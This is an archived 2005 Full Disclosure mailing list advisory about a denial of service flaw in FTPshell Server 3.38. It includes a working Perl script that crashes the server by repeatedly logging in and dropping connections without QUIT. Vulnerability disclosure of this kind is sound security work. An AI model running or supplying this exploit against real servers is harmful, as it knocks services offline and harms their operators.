Full Disclosure mailing list archives
Denial of service vulnerability in FTPshell Server Version 3.38
From: Reed Arvin <reedarvin () gmail com>
Date: Mon, 25 Jul 2005 19:50:41 -0700
Summary: Denial of service vulnerability in FTPshell Server Version 3.38 (http://www.ftpshell.com/) Details: Logging into the FTP server successfully and then closing the connection (without using the QUIT command) 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell Server Version 3.38 Patches/Workarounds: The vendor was notified of the issue. A patch will be release shorly. The patch will be made available via the vendor's web site (http://www.ftpshell.com/). Exploits: Run the following PERL script against the server. The corresponding process will die. #===== Start FTPShell_FTPDOS.pl ===== # # Usage: FTPShell_FTPDOS.pl <ip> <user> <pass> # FTPShell_FTPDOS.pl 127.0.0.1 hello moto # # FTPshell Server Version 3.38 # # Download: # http://www.ftpshell.com/ # ################################################ use IO::Socket; use Win32; use strict; my($i) = ""; my($socket) = ""; for ($i = 1; $i <= 40; $i++) { if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Login \#$i\n"; Win32::Sleep(300); print $socket "USER $ARGV[1]\r\n"; Win32::Sleep(100); print $socket "PASS $ARGV[2]\r\n"; Win32::Sleep(100); print $socket "PORT 127,0,0,1,18,12\r\n"; Win32::Sleep(100); close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } } #===== Start FTPShell_FTPDOS.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Denial of service vulnerability in FTPshell Server Version 3.38 Reed Arvin (Jul 26)